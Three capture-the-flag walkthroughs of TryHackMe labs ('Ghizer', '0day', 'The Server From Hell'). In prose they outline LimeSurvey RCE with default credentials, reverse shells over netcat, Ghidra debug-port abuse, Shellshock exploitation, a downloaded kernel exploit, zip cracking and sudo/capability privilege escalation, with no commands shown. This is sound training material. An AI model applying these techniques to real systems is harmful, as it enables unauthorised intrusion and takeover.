Ghizer TryHackMe Walkthrough

Today we’re going to solve another boot2root challenge called “Ghizer“. It’s available at TryHackMe for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to stuxnet. Let’s get started and learn how to break it down successfully.

Level: Easy

Since these labs are available on the TryHackMe website.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Dirsearch
  • Searchsploit
  • Linpeas
  • Jdb
  • Chisel

Exploiting

  • Exploit LimeSurvey < 3.16 Remote Code Execution (RCE)

Privilege Escalation

  • Abuse of debug mode Ghidra
  • Abuse of permissions of python scripts with SUDO
  • Capture the flag

Walkthrough

Reconnaissance

We put the IP address in “etc/hosts” file and execute nmap.

Enumeration

We enumerate with nmap the access FTP services with an anonymous account, But we don’t have to write and read permissions

We access the website and look at the website, review code and sections, but find nothing that can be useful to us.

We found a working WordPress on port 443. We a hint for administration panel found, it is protected for WPS Hide Login plugin.

Is easy, we search link in the bottom of the page web and we will have the route panel administration.

We use Dirsearch tool and we enumerate files with version software, directories and other files.

Exploiting

We use searchsploit in searched of exploits for LimeSurvey, we found an exploit for Remote Code Execution (RCE).

This exploit required credentials for you use, we search in Google for “Credentials default LimeSurve” and we enumerated default credentials.

We use the exploit with the credentials found and we have a shell.

We have a shell very limited, I used the web shell of PentestMonkey’s, downloading it to the folder and executed with netcat in listening.

We have a new shell! We execute two favourites commands for an interactive shell.

We found config.php file, on the stand username and password of limeDB.

Privilege Escalation (user Veronica)

We use “linpeas.sh” script and we enumerated connections in use of ghidraDebug with Veronica user.

We enumerate GhidraDebug service internal on port 18001.

We need remote command to execute in GhidraDebug, I used this guide my friends “HackPlayers“.

We use “Chisel” for port forwarding on local port 18001.

We jdb tool for connecting with we localhost, we executed “classpath” command and we view the base directory of “Veronica” user.

We listed “WatchManager$WatchRunnable“, so we’re on the right track.

We stop the service and wait a few seconds until we get the second answer.

We set a netcat to listen and execute the following command, this will return a shell as the user “Veronica“.

And with the access to this user, we can read the flag of user.txt.

Privilege Escalation (root)

We execute the command “sudo -l“, we have permission to execute a script in Python called “base.py“.

We tried to insert a new line, but we do not have permission to edit the file. But we do to delete it!

We delete the file, create a new one inserting the execution of a bash as root, execute as sudo this file, scale privileges as root and read the flag.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.

0day TryHackMe Walkthrough

Today we’re going to solve another boot2root challenge called “0day“. It’s available at TryHackMe for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to MuirlandOracle and 0day. Let’s get started and learn how to break it down successfully.

Level: Medium

Since these labs are available on the TryHackMe website.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Dirsearch
  • Searchsploit
  • Linux-exploit-suggester.sh

Exploiting

  • Exploit Shellshock Remote Command Inject (RCI)

Privilege Escalation

  • Exploit Overlays Local Privilege Escalation
  • Capture the flag

Walkthrough

Reconnaissance

We put the IP address in “etc/hosts” file and execute nmap.

Enumeration

We access the website and look at the website, review code and sections, but find nothing that can be useful to us.

We launched the dirsearch tool and listed several interesting directories.

In the “backup” directory we found this RSA key, but at least I didn’t need it to access the machine.

We see that we have access to the resource “/cgi-bin/test.cgi“, so I remember that on other machines I have been able to exploit the “admin.cgi” file with the “ShellShock” vulnerability.

We manually evidence that the site is indeed vulnerable to “Shellshock“, as shown in the image below, this returns the id.

Exploiting

We looked for the exploit with the tool “searchsploit“, we found the “34900.py“.

We execute the exploit specifying the type of payload, the victim host, our ip and port. If everything went well, we will get a reverse shell.

We access the user’s home folder and read the user.txt flag.

Privilege Escalation (root)

We use the script “linux-exploit-suggester.sh” and it lists several exploits that could be good for escalating privileges.

We make use of the exploit: https://www.exploit-db.com/download/37292

We compile the exploit in our computer, we download the exploit in the victim machine with “wget” and we execute it, it will give us a shell as root and we will be able to read the flag root.txt.

NOTE: If the exploit fails, it’s probably your reverse shell, msfvenom and a Metasploit handler could be of help 😉

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.

The Server From Hell TryHackMe Walkthrough

In this article, we will provide the write-up of the Try Hack Me Room: The Server from hell. This is a write-up about a medium level boot to root Linux box which is available for free on TryHackMe for penetration testing practice. Let’s get started and learn how to break it down successfully.

Level: Medium

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • netcat
  • Mounting NFS directory

Exploiting

  • Cracking zipfile using fcrackzip
  • Connecting to ssh port
  • Interacting with irb shell

Privilege Escalation

  • getcap to checkout file capabilities
  • Capture the flag

Walkthrough

Reconnaissance

Using nmap, we have performed reconnaissance, where we found many open ports available.

Looking at the room description, there was an interesting thing that we discovered. The number 12345 is present in every port’s banner. So thinking that as a hint, I connected to that port.

Enumeration

Using Netcat we will now connect to port 12345, where we found another hint which leads us to NFS port.

From the hint that we got earlier, we found out /home/nfs directory using showmount command.

Now simply mount that share

After mounting we have found backup.zip file which is password protected.

Exploiting

Now we use fcrackzip to bruteforce the zip file where we find the password.

Let’s unzip the file. On unzipping it shows home/hades/.ssh directory.

We go to home/hades/.ssh/ where we have found one ssh private key, flag.txt and a hint.txt. When we open hint.txt we get a clue which says 2500-4500.

When we conducted a nmap scan, from 2500-4500 we found that ssh is running on port 3333.

Now we connect to ssh port using a private key that we found earlier, Now we have found a shell, which is an interactive ruby shell. So in order to get a /bin/bash shell run

Here we have found user.txt

Privilege Escalation

Now we have got a hint about getcap which tells us which of the binary has the capability to get access to everything on the system.

Now with the help of GTFO bin, we have made use of tar capability to find root flag.

Author: Shrishty Dayal is a Cyber Security Enthusiast who loves to explore and gain more knowledge in the cybersecurity Domain Contact Linkedin